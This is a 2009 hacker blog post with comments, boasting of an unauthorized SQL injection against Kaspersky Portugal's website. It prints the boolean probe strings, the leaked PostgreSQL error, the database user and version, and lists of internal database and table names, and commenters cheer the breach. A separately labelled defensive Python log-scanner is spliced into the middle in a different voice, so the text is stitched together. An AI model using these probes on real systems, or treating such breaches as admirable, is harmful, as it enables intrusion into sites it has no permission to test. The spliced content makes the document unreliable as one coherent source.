Kaspersky Owned
November 29th, 2009 TinKode Posted in PostGreSQL Injection | 83 Comments »
_ __ _
| | / / | |
| |/ / __ _ ___ _ __ ___ _ __ ___| | ___ _
| \ / _` / __| '_ \ / _ \ '__/ __| |/ / | | |
| |\ \ (_| \__ \ |_) | __/ | \__ \ <| |_| |
\_| \_/\__,_|___/ .__/ \___|_| |___/_|\_\\__, |
| | __/ |
|_| |___/
#owned by c0de.breaker
One evening, while I was looking for an antivirus, I landed on the official Portuguese Kaspersky website by mistake.
Link: www.kaspersky.com.pt
Kaspersky, as far as I know, had already been hacked by "unu" via MySQL injection.
So I told myself to try and see whether I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely:
Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121
ERRO na execucao da query getRevendedors
ERROR: syntax error at or near "\" at character 306
pg_exec(): that means the site uses a PostgreSQL database.
First, I checked whether it was injectable and whether I could extract anything.
The answer:
---------------------------------------------------------------
True:  and 1=1--
False: and 1=2--
---------------------------------------------------------------
So I can do PostgreSQL injection!
What did I extract?
I wasn't interested in the content; I only "got" the names of the databases, tables and columns.
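A defender's view of the two things shown above (the raw pg_exec() error that fingerprints the backend, and the true/false probe pair that confirms blind injection): this is added example code, not from the post, that scans constructed Apache-style access-log lines for paired boolean probes and checks a response body for the leaked error. The log lines, IP addresses and paths are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log lines (not from the original post).
SAMPLE_LOG = """\
203.0.113.7 - - [29/Nov/2009:21:03:11 +0000] "GET /revendedores.php?id=12 HTTP/1.1" 200 5120
203.0.113.7 - - [29/Nov/2009:21:04:02 +0000] "GET /revendedores.php?id=12+and+1%3D1-- HTTP/1.1" 200 5120
203.0.113.7 - - [29/Nov/2009:21:04:15 +0000] "GET /revendedores.php?id=12+and+1%3D2-- HTTP/1.1" 200 3010
198.51.100.4 - - [29/Nov/2009:21:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 7000
"""
# Constructed response body echoing the kind of error quoted in the post.
SAMPLE_ERROR_BODY = 'Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "\\" at character 306'

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+)')
# "and N=M" followed by a SQL comment opener: the boolean probe shown in the post.
PROBE_RE = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(\d+)\s*(?:--|#|/\*)", re.I)
# Raw PHP/PostgreSQL error text that tells an attacker which backend is in use.
PG_ERROR_RE = re.compile(r"pg_(?:exec|query)\(\)|ERROR:\s+syntax error at or near", re.I)


def find_boolean_probes(log_text):
    """Return (ip, path, param, kind, size) per probe; kind is 'true' for N=N, else 'false'."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        # parse_qsl percent-decodes the value and turns '+' into spaces for us
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            pm = PROBE_RE.search(value)
            if pm:
                kind = "true" if pm.group(1) == pm.group(2) else "false"
                hits.append((m.group("ip"), parts.path, key, kind, int(m.group("size"))))
    return hits


def paired_probes(log_text):
    """Flag (ip, path, param) triples that received both a true and a false
    condition with differing response sizes: the blind-injection signal."""
    seen = {}
    for ip, path, key, kind, size in find_boolean_probes(log_text):
        seen.setdefault((ip, path, key), {})[kind] = size
    return sorted(k for k, v in seen.items()
                  if "true" in v and "false" in v and v["true"] != v["false"])


def leaks_pg_error(body):
    """True if a response body exposes a raw pg_exec()/PostgreSQL error."""
    return PG_ERROR_RE.search(body) is not None
```

The same paired-probe check can be fed from a WAF or reverse-proxy log as long as the query string and response size survive; the error check belongs in a response filter, since display_errors on a production PHP host is what handed the attacker the backend name.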
#Principal Database: dbdoc
#User: www-data
#Version: PostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)
#Other Databases
1 postgres
2 template1
3 template0
4 monitoring
5 estkaspersky
6 horde
7 licence
8 hardwareipbrick
9 acessosclientes
10 licencefmota
11 temp
12 dbdoc
13 webcalendar
14 ipbox
15 adcav
16 jpleitao2
17 funambol
18 gaia
19 cinel2
20 makeupdate
21 tempdefaultconfig
#The tables from the dbdoc database (number: 458)
1 table_base_idxml73
2 table_ass_idxml73_idtab1025
3 liga_tipoent_categoria
4 liga_subcat_categoria
5 classif_entidades
6 ignora
7 categoria_entidade
8 site
9 subcategoria_entidade
10 tabela_gestao_ipcontactos
11 ipcontactos_lang_files
12 utilizador_externo
13 webcal_sincro
14 pga_queries
15 pga_forms
16 pga_scripts
17 pga_reports
18 pga_schema
19 pga_layout
20 avaliar
21 estadorec1
22 liga_resultado_tarefa
23 webcal_user
24 utilizadores_operacao
25 webcal_entry
26 webcal_entry_repeats
27 webcal_entry_repeats_not
28 webcal_entry_user
29 webcal_entry_ext_user
30 webcal_user_pref
31 webcal_user_layers
32 exhumationprice
33 webcal_site_extras
34 webcal_reminder_log
35 webcal_group
36 table_base_idxml13
37 webcal_group_user
38 webcal_view
39 webcal_view_user
40 gravetype
41 webcal_entry_log
42 webcal_categories
43 webcal_config
44 cemeterysection
45 solucao
46 ipdoclanguages
47 ipdoctranslation
48 ipdocsentences
49 ipdocpages
50 ipdocpagetranslation
51 table_base_idxml15
52 table_ass_idxml15_idtab51
53 lockcodigos
54 assunto
55 table_base_idxml16
56 subassunto
57 table_ass_idxml16_idtab68
58 entidades2
59 coordenadas_estado
60 dados_infantarios
61 coordenadas_estadopr
62 codigo_accaopr
63 table_base_idxml17
64 raca
65 table_base_idxml18
66 table_base_idxml19
67 table_base_idxml20
68 table_base_idxml14
69 distrito
70 concelho
...
439 accaopr
440 table_base_idxml79
441 estadopr
442 funcaoproc
443 funcaopr
444 table_ass_idxml79_idtab1183
445 table_ass_idxml79_idtab1190
446 table_ass_idxml79_idtab1191
447 table_ass_idxml79_idtab1192
448 table_ass_idxml79_idtab1193
449 table_ass_idxml77_idtab1194
450 table_base_idxml78
451 table_ass_idxml80_idtab1216
452 table_base_idxml81
453 table_ass_idxml81_idtab1228
454 table_base_idxml70
455 table_base_idxml82
456 documento
457 revisaodoc
458 table_ass_idxml82_idtab1257
#Me: I keep thinking: since this is one of the largest companies in the world, one that protects perhaps many millions of users through its products,
why don't they take care of their own security first? This may also be because of the firms that build these websites in a very short time for exaggerated sums of money...
That's about it.
~Where there is a will, there is a way



December 3rd, 2009 at 14:26
A very good job, mister. Congratulations on the attack.
Would you like to exchange blogroll links?
December 3rd, 2009 at 18:02
Bravo TinKode !
December 4th, 2009 at 01:29
Thank you, I like it :) Bravo ;)
December 4th, 2009 at 01:44
c***e if you don't give me some licences.... I'm not playing with you anymore
December 4th, 2009 at 07:51
[...] This post was Twitted by jabra [...]
December 4th, 2009 at 14:23
The author is a good fellow)))
December 5th, 2009 at 11:29
Oh, yes, we have a hacker among us.
http://www.worldit.info/noutati/un-roman-a-spart-website-ul-kaspersky-din-portugalia/
If "owned" and "hacked" have started to appear, it's clear. And I thought you had more sense...
December 5th, 2009 at 13:28
And how would you have wanted me to put it: "Kaspersky little flowers in the field"?
I don't understand why, when I see you, you pick on such tiny nonsense.
And if I look more closely, I wasn't the first to use these words!
Why don't you comment over there that they used HACKED?
I would say more, but I'll hold back!
Ah, yeah, and I thought you had more sense too, but oh well...
December 5th, 2009 at 14:32
Ohh that’s great job mate, keep up
December 6th, 2009 at 02:59
Great job... I await the next big company!
Keep up
December 6th, 2009 at 11:56
nice finding TinKode!
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://hackingexpose.blogspot.com/2009/06/multi-purpose-postgresql-injection-tool.html
December 6th, 2009 at 17:05
@d3ck4:
Much better to do it manually!
But sometimes it's good to use some scripts (only if you know how to do it manually first)
@infosec:
Will be soon!
December 6th, 2009 at 18:28
alert(“Really nice job”)
December 7th, 2009 at 02:36
@TinKode
agree!
but don't tell me you extracted all this data manually
that's a lot of time consumed, did ya
December 7th, 2009 at 02:52
All manual!
I didn’t use any tool!
December 7th, 2009 at 23:42
tin, fmm, get on messenger, I cracked a hash for you
))))))))))))
December 8th, 2009 at 15:13
nice.... using the cast command... I am still researching that command (researching d3ck4's tool)
)
December 10th, 2009 at 23:25
SQLi never dies... tinkode still breaker
December 13th, 2009 at 06:56
Hello, good work..
January 13th, 2010 at 23:13
tinkode, an email or something? I want to ask you a few things too.. maybe you can help me... thanks in advance